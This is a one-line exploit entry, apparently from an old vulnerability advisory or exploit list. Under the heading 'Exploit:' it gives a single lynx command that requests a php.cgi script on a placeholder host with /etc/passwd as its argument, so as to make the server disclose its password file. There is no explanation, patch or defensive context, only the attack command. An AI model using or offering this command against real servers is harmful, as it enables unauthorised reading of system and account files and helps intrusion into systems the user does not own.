Exploit:

  lynx http://www.host.com/cgi-bin/php.cgi?/etc/passwd